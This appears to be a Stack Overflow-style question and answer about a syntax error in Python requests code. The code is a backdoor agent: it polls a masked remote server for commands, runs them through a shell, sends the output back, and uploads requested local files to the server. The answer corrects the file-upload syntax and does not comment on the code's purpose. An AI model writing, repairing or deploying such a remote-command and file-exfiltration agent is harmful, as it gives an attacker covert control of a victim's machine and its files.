# Send file using POST requests in Python3 [ error: invalid syntax ]

Tags: python-3.x, http-post, python-requests

I am trying to send file using post method in requests module in python 3.5 , I am getting error saying "invalid syntax" in these lines,

```
  files = ('file':open(path,'rb'))
  r = requests.post(('htttp://#########', files= files))
```

Full code is as follows.

```
import requests
import subprocess
import time
import os

while True:
     req = requests.get('htttp://########')
     command = req.text
     if 'terminate' in command:
         break
     elif 'grab' in command:
         grab,path = command.split('*')
         if os.path.exists(path):
             url = 'http://#########/store'
             files = ('file':open(path,'rb'))
             r = requests.post(('htttp://#########', files= files))
         else:
             post_request = requests.post(url='htttp://#########',data='[-] 
             Unable to find file !')
     else:
    CMD = subprocess.Popen(command,shell=True, stderr=subprocess.PIPE, 
    stdin=subprocess.PIPE,stdout=subprocess.PIPE)   
    post_request=requests.post(url='htttp://########',data=CMD.stdout.read())
    post_request = requests.post(url= 'htttp://######', 
                    data=CMD.stderr.read())

    time.sleep(3)
```

Comment: Your first line is not correct python syntax, what are you trying to do? If this is supposed to be a dict, you need curly braces instead of parens

Answer (score -1):

You probably want this:

```
files = {'file': open(path, 'rb')}
r = requests.post('htttp://#########', files=files)
```

`dict`s are created using curly braces, not parentheses, and you had extra parentheses around the parameters in your call to `requests.post`.